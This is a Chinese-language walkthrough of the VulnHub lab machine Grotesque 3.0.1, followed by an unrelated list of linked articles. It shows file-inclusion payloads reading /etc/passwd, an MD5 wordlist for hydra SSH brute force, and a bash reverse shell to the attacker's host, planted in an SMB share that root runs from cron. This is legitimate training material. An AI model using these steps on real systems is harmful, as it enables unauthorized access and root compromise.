准备:

攻击机:虚拟机kali、本机win10。

靶机:Grotesque: 3.0.1,下载地址:https://download.vulnhub.com/grotesque/grotesque3.zip,下载后直接vbox打开即可。

知识点:ffuf参数爆破、定时任务、445端口利用、smbclient使用。

信息收集:

通过nmap扫描下网段内的存活主机地址,确定下靶机的地址:nmap -sn 172.20.10.0/24,获得靶机地址:172.20.10.4。

扫描下端口对应的服务:nmap -T4 -sV -p- -A 172.20.10.4,显示开放了22、80端口,开启了ssh、http服务

目录扫描:

使用dirmap进行目录扫描,发现atlasg.jpg图片,emmmm,访问80端口的时候也能直接查看到该图片。

查看该图片利用steghide尝试获取隐藏信息,但是获取失败,后来发现一个提示信息:m、d和五个x,应该是告诉我们和md5有关。

根据提示生成一个md5字典,这里我们将/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt字典进行md5加密,命令:for i in $(cat directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dirmd5.txt; done。记得替换里面的横线和空格。然后使用gobuster进行目录扫描,发现:/f66b22bf020334b04c7d0d3eb5010391.php。

参数名爆破:

访问:http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php无任何回显信息,源代码信息中也无任何信息。因此尝试使用ffuf进行参数爆破,命令:fuzf -f -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt,但是未扫描出来,然后更换字典,命令:ffuf -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/wordlists/dirb/big.txt,发现了参数名:purpose。

爆破ssh密码:

读取/etc/passwd文件,发现账户名:freddie。

使用文件包含漏洞读取下ssh私匙和公匙均读取失败,命令:http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa和http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa.pub,然后尝试下使用md5字典爆破下ssh密码,命令:hydra -l freddie -P dirmd5.txt ssh://172.20.10.4,成功获得freddie账户的ssh登录密码:61a4e3e60c063d1e472dd780f64e6cad。

获取shell:

使用获得账户名和密码:freddie/61a4e3e60c063d1e472dd780f64e6cad进行ssh登录,命令:ssh freddie@172.20.10.4,在freddie用户下发现user.txt文件,读取该文件成功获取到flag值。

提权:

查看下当前账户是否存在可以使用的特权命令,sudo -l,显示不存在。

通过:find / -perm -4000 -type f 2>/dev/null来查找下是否存在可疑文件,但是未发现可利用的漏洞。

查看下当前设备开放的端口信息,命令:ss -nutl,发现了445端口。

在kali使用enum4linux 172.20.10.4和smbclient -L 172.20.10.4进行信息收集均失败,但是在靶机中smbclient -L 172.20.10.4执行成功,获得一个目录:grotesque。

进入该目录查看目录信息,命令:smbclient //127.0.0.1/grotesque,发现不存在文件信息。

下载pspy64文件并通过http服务上传到靶机,在靶机执行监控靶机的执行进程,发现靶机中每一分钟会一root权限执行smbshare目录下的文件。

在靶机中写一个反弹shell的脚本,内容:#!/bin/bash   sh -i >& /dev/tcp/172.20.10.7/6688 0>&1。

利用刚才发现的共享文件夹:grotesque,将反弹shell脚本上传到smbshare目录下,然后在kali端开启对6688端口的监听,成功获得反弹的shell并在root目录下读取到flag值。

vulnhub靶场之GROTESQUE: 3.0.1的更多相关文章

  1. vulnhub靶场之JANGOW: 1.0.1

    准备: 攻击机:虚拟机kali.本机win10. 靶机:JANGOW: 1.0.1,地址我这里设置的桥接,,下载地址:https://download.vulnhub.com/jangow/jango ...

  2. 【Vulnhub靶场】JANGOW: 1.0.1

    时隔这么久,终于开始做题了 环境准备 下载靶机,导入到virtualBox里面,这应该不用教了吧 开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了 攻击机IP地址为:192.168.2 ...

  3. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  4. VulnHub靶场学习_HA: ARMOUR

    HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...

  5. VulnHub靶场学习_HA: InfinityStones

    HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ...

  6. VulnHub靶场学习_HA: Chanakya

    HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...

  7. VulnHub靶场学习_HA: Chakravyuh

    HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ...

  8. VulnHub靶场学习_HA:Forensics

    HA:Forensics Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-forensics,570/ 背景: HA: Forensics is an ...

  9. Vulnhub靶场——DC-1

    记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...

  10. vulnhub靶场之DRIPPING BLUES: 1

    准备: 攻击机:虚拟机kali.本机win10. 靶机:DRIPPING BLUES: 1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhu ...

随机推荐

  1. Jupyter notebook导入Pycharm项目的.py文件里的模块及方法

    Jupyter notebook导入Pycharm项目种的.py文件里的模块及方法 需要在Jupyter notebook里调用自己写的代码,过程如下. 首先在Pycharm里写好一个文件,例如DCC ...

  2. 带有pwn环境的Ubuntu22.04快速安装

    pwn环境ubuntu22.04快速安装(有克隆vmk) ubuntu更新到了22.04版本,经过本人测试后非常的好(ma)用(fan),该版本和mac很相像,而且用起来也比较丝滑,只不过配置上稍微有 ...

  3. ExcelHelper ->NPOI插件

    调用: var ms = ExcelHelper.PrintInvoiceToExcel("观看时长", headline, items, (row, item) => { ...

  4. SpringBoot(七) - Redis 缓存

    1.五大基本数据类型和操作 1.1 字符串-string 命令 说明 set key value 如果key还没有,那就可以添加,如果key已经存在了,那会覆盖原有key的值 get key 如果ke ...

  5. 5.pygame快速入门-精灵和精灵组

    在之前案例中,图像加载.位置变化.绘制图像都需要编写代码分别处理 pygame提供了两个类简化开发步骤 pygame.sprite.Sprite #精灵,存储图像数据image和位置rect的对象 p ...

  6. 八、指定节点pod运行在固定节点

    指定pod运行在固定节点 一.指定固定节点:Pod.spec.nodeName Pod.spec.nodeName 将 Pod 直接调度到指定的 Node 节点上,会跳过 Scheduler 的调度策 ...

  7. Python--网络编程学习笔记系列01 附实战:udp聊天器

    Python--网络编程学习系列笔记01 网络编程基本目标: 不同的电脑上的软件能够实现数据传输 网络编程基础知识: IP地址: 用来在网络中标记一台电脑  网络号+主机号(按网络号和主机号占位分类A ...

  8. 谷歌拼音自带lua

    function fast_string_banji(argument) return {"快捷1", "快捷2", "快捷3", &quo ...

  9. 最长不下降子序列(线段树优化dp)

    最长不下降子序列 题目大意: 给定一个长度为 N 的整数序列:A\(_{1}\),A\(_{2}\),⋅⋅⋅,A\(_{N}\). 现在你有一次机会,将其中连续的 K 个数修改成任意一个相同值. 请你 ...

  10. 成熟企业级开源监控解决方案Zabbix6.2关键功能实战-下

    @ 目录 实战 Zabbix server源码安装使用示例 部署 配置 Zabbix agent2使用示例 部署 配置 Zabbix proxy使用示例 部署 配置 自定义监控使用示例 触发器使用示例 ...